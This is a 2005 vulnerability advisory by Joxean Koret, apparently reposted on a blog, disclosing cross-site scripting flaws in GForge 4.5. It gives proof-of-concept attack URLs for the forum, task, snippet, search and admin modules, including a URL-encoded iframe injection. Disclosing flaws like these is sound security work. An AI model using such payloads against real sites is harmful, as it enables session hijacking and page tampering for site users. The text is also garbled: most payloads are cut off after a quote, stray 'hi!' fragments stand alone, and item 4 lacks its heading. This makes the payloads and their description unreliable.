Cross Site Scripting vulnerabilities in GForge

Date July 30, 2005

Author: Jose Antonio Coret (Joxean Koret)
Date: 2005
Location: Basque Country

—————————————————————————

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

GForge – 4.5 (Current)

GForge has tools to help your team collaborate, like message forums and
mailing lists; tools to create and control access to Source Code
Management
repositories like CVS and Subversion. GForge automatically creates a
repository
and controls access to it depending on the role settings of the project.

Web : http://gforge.org/

—————————————————————————

A) Cross Site Scripting Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1.- In the Forum Module:

http://[target]/forum/forum.php?forum_id=”>
http://[target]/forum/forum.php?group_id=”>

(NOTE: The group_id parameter is ALWAYS vulnerable.)

2.- In the Task Module:

http://[target]/pm/task.php?func=detailtask&project_task_id=">

hi!

&group_id=1&group_project_id=3

3.- In the Snippets Module:

http://[target]/snippet/detail.php?type=snippet&id=21″>

hi!!!

in
the
search field and press enter or try the following URL:

http://[target]/search/?type_of_search=soft&words=%22%3E%3Ch1%3EHi%21%

3C%2Fh1%3E%3Ciframe+src%3Dhttp%3A%2F%2Fslashdot.org%3E%3C%2Fiframe%
3E&Search=Search

5.- In other modules:

http://[target]//frs/admin/qrs.php?group_id=”>

http://[target]/notepad.php?form=parent;%0d%0a–>%0d%

0a

hi!

Contact:
~~~~~~~~
Joxean Koret at joxeanpiti< <<@>>>yah00< <<>>es

Category Posted in Exploits and Bugs

Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>